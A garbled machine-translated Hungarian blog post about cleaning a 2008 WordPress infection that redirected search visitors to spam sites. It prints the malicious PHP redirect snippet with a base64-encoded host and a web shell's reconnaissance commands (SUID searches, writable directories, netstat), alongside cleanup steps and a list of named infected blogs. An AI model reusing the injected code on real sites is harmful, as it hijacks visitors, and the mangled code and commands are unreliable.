Az elmúlt hónapban, kaptam figyelmeztetést vírus blog Egyes látogatók. Kezdetben figyelmen kívül hagyta a figyelmeztetéseket, mert telepített egy nagyon jó víruskereső (Kaspersky AV 2009), És bár a blog hosszú idő, én soha nem kaptam egy vírus figyelmeztetés (.. láttam valamit gyanús korábban, hogy az első frissítés eltűnt. Végül ...).
Lassan kezdtek megjelenni a nagy eltérések látogatói forgalmatEzt követően a forgalom az utóbbi időben folyamatosan csökken, és kezdett egyre több ember, akik azt mondják, hogy stealthsettings.com van virused. Tegnap kaptam valakitől egy screenshot tenni, ha a víruskereső blokkolja a forgatókönyv A stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ez elég meggyőző számomra, hogy az összes forrásból keresni. Az első gondolat, hogy jutott eszembe volt, hogy frissítés a legfrissebb WordPress (2.5.1), de csak a régi script hogy törölje az összes fájlt a WordPress és biztonsági adatbázis. Ez az eljárás nem hozott eredményt, és valószínűleg sokáig tartott, hogy megmondja, hol van a buba, ha nem mondta volna Eugen a vita egy kávé, talált link A Google és jó lenne látni.
MyDigitalLife.info, megjelent egy cikket "WordPress Hack: Nyerje vissza és rögzítse a Google és a Search Engine or No Cookie forgalom irányítva a-Needs.info, AnyResults.Net, Golden-Info.net és más illegális oldalak"Ez a végén a menet volt szükségem.
Arról van szó, a kihasználni WordPress alapú süti, Ami szerintem nagyon bonyolult, és tette a könyvet. Okos elég ahhoz, hogy a SQL Injection Adatbázis a blog, hogy hozzon létre egy láthatatlan felhasználó egy egyszerű rutin ellenőrzés Műszerfal->felhasználók, ellenőrizze a szerver könyvtárakat és fájlokat "írható" (A chmod 777), hogy megkeresse és kivégez fájlok a kiváltságokat a root felhasználó vagy csoport. Nem tudom, akik kihasználják a nevét, és látom, hogy van néhány cikket írt róla, annak ellenére, hogy sok blogot fertőzött, köztük Románia. Ok ... Megpróbálom, hogy megpróbálja elmagyarázni általánosságokat a vírus.
Mi az a vírus?
Először helyezze a forrás oldalon a blogok, linkek láthatatlan a látogatók, de látható és váltólapkás keresők, főleg a Google. Ily módon a át Page Rank az oldalak által megadott támadó. Másodszor, az egyik be van helyezve átirányítás kód URL látogató érkezik a Google, Live, Yahoo, ... vagy egy RSS-olvasót, és nem a helyszínen aprósütemény. egy víruskereső érzékeli a átirányítására Trojan-Clicker.HTML.
Tünetek:
Masszív visszaesés látogatói forgalmat, Különösen a blogok, ahol a legtöbb látogató a Google-tól.
Azonosítás: (Így lett probléma azok számára, akik nem tudják, hogyan, hogyan kell phpmyadmin, php és linux)
LA. FIGYELEM! Először egy biztonsági másolat adatbázisban!
1. Ellenőrizze a forrás fájlokat index.php, header.php, footer.php, A blog témája és nézd meg, van egy kód, amely titkosítást használ base64 vagy tartalmaz "if ($ ser ==" 1? && sizeof ($ _COOKIE) == 0) "formában:
<? Php
$ Seref = array ("Google", "msn", "élő", "AltaVista"
"Ask", "Yahoo", "AOL", "CNN", "időjárás", "Alexa");
$ Ser = 0, foreach ($ Seref as $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']) $ ref)! == False) {$ ser = "1?, Break;}
if ($ ser == "1? && sizeof ($ _COOKIE) == 0) {header (" Location: http:// ". base64_decode (" YW55cmVzdWx0cy5uZXQ = ').' / ') exit;
}>
... Vagy valami. Törölje ezt a kódot!
Kattints a képre ...
A fenti screenshot választottam a hibát, és "<? Php get_header ();?>". Ezt a kódot kell maradnia.
2. Használat phpMyAdmin és megy az adatbázis tábla wp_usersAhol ellenőrizze, nincs felhasználónév létrehozott 00:00:00 0000-00-00 (Lehetséges elhelyezése user_login írni "WordPress". Írja ezt a felhasználói azonosítót (field ID), majd törölje azt.
Kattints a képre ...
* A zöld vonal el kell távolítani, és a visszatartott az igazolványát. Abban az esetben, álmosVajon ID = 8 .
3. Menj a táblázat wp_usermeta, Hol található és törlés vonalak azonosító (ahol a terület user_id ID érték megjelenik törlése).
4. Táblázat wp_option, Ugrás active_plugins és mi bővítmény engedélyezve van gyanúsított. Ezt fel lehet használni, mint a vég _old.giff, _old.pngg, _old.jpeg, _new.php.giff, stb. a hamis kép kiterjesztések _old és _new kombinációival.
SELECT * FROM WHERE wp_options option_name = 'active_plugins'
Törlés ez a plugin, akkor megy a blog -> Dashboard -> Plugins, ami ki és be egy bizonyos plugin.
Kattints a képre, hogy úgy tűnik, active_plugins vírus fájlt.
Kövesd az utat az FTP vagy SSH, megjelölt active_plugins és törölje a fájlt a szerverről.
5. Minden phpMyAdmin, táblázat wp_option, Keresse meg és törölje a sort tartalmazza: "rss_f541b3abd05e7962fcab37737f40fad8"És az"internal_links_cache ".
A internal_links_cache készült titkosított spam linkek jelennek meg a blog, és a Google Adsense kód, A hacker.
6. Javasoljuk, hogy jelszó megváltoztatása Blog és bejelentkezés távolítsa el az összes gyanús userele. Frissítés a legújabb verzióra a WordPress és állítsa be a blog, hogy ne engedélyezze az új felhasználók. Nincs veszteség ... nem tud nyilatkozni, és logikátlan.
Megpróbáltam felmagyarázni, mennyit, mit tegyek egy ilyen helyzetben, hogy tisztítsák meg a blogot a vírustól. A probléma sokkal rosszabb, mint amilyennek látszik, és nem is oldódik meg, mert használják biztonsági réseket A webszerver hosting, ami a blog.
Ennek első fokú biztonság, hozzáférési SSH, Hogy néhány ellenőrzést a szerveren, hogy ha azokat a fájlokat, mint a * _old * és * _new. * A befejezés.Giff,. jpeg,. pngg,. jpgg. Ezeket a fájlokat törölni kell. Ha átnevezi a fájlt, például. top_right_old.giff in top_right_old.phpLátjuk, hogy a fájl pontosan exploit kódot szervert.
Néhány hasznos tipp a kiszolgáló ellenőrzéséhez, tisztításához és biztosításához. (SSH-n keresztül)
1. cd / tmp és ellenőrizze, hogy vannak mappák, mint a tmpVFlma vagy más kombinációk is ugyanaz a neve, és törölje azt. Lásd a lenti képen, két ilyen mappák tőlem:
rm-rf foldername
2. Ellenőrizze elimiati (chmod változás) a lehető mappák attribútumok chmod 777
megtalálni az összes írható fájlok a jelenlegi konyvtarban: Keresés. -Type f-perm-2-ls
megtalálni az összes írható könyvtárak a jelenlegi konyvtarban: Keresés. -Type d-perm-2-ls
megtalálja az összes írható könyvtárak és fájlok a jelenlegi konyvtarban: Keresés. -Perm-2-ls
3. Keresi a gyanús fájlokat a kiszolgálón.
Keresés. -Name "* _new.php *"
Keresés. -Name "* _old.php *"
Keresés. -Name "*. Jpgg"
Keresés. -Name "* _giff"
Keresés. -Name "* _pngg"
4, FIGYELEM! A fájlok állították bit SUID si SGID. Ezek a fájlok végre a felhasználó jogosultságával (csoport) vagy gyökér, sem a felhasználó, aki végrehajtja a fájlt. Ezek a fájlok vezethet gyökér kompromisszum, ha biztonsági kérdéseket. Ha a fájlok SUID és SGID bit, végre "chmod 0 " be vagy távolítsa el a csomagot tartalmazó.
Exploit tartalmazza valahol a forrás ...:
if ($ safe_mode) {
if ($ os_type == 'nix) {
$ Os. = Execute (sysctl-n kern.ostype ');
$ Os. = Execute (sysctl-n kern.osrelease ');
$ Os. = Execute (sysctl-n kernel.ostype ');
$ Os. = Execute (sysctl-n kernel.osrelease ');
if (empty ($ user)) $ user = végre ('id');
$ Nevek = array (
"=>",
"Find suid files '=>' find /-type f-perm-04000-ls"
"Find sgid files '=>' find /-type f-perm-02000-ls"
"Találd meg az összes írható fájlok jelenlegi dir '=>' megtalálni. -Type f-perm-2-ls "
"Találd meg az összes írható könyvtárak jelenlegi dir '=>' megtalálni. -Type d-perm-2-ls "
"Találd meg az összes írható könyvtárak és fájlok aktuális dir '=>' megtalálni. -Perm-2-ls "
"Mutasd nyitott port '=>' netstat-an | grep-i hallgat"
);
} Else {
$ Operációs_rendszer_neve. = Execute (ver ');
$ User. = Execute (echo% username% ');
$ Nevek = array (
"=>",
"Mutasd rúnaírásos szolgáltatások '=>' net start"
'Show folyamat list' => 'tasklist "
);
}
Ily módon ... alapvetően találja megsértése a biztonság. Ports nyitott könyvtárak "írható" és csoportos végrehajtás kiváltságokat fájlok / root.
Vissza több ...
Egyes blogok fertőzött: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro / blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, Www.artistul.ro / blog /,
www.mirabilismedia.ro / blog, Blog.einvest.ro
... A lista folytatódik ... sokat.
Úgy ellenőrizheti, hogy a blog a vírus, a Google kereső. másolás és beillesztés:
oldal www.blegoo.com vásárolni
Jó éjszakát, és több munkát ;) Nemsokára jön fel a frissítésekről Eugen on prevezibil.imprevizibil.com.
BRB :)
TO: FIGYELEM! Változó WordPress téma vagy frissítés WordPress 2.5.1, nem megoldás, hogy megszabaduljon a vírus.
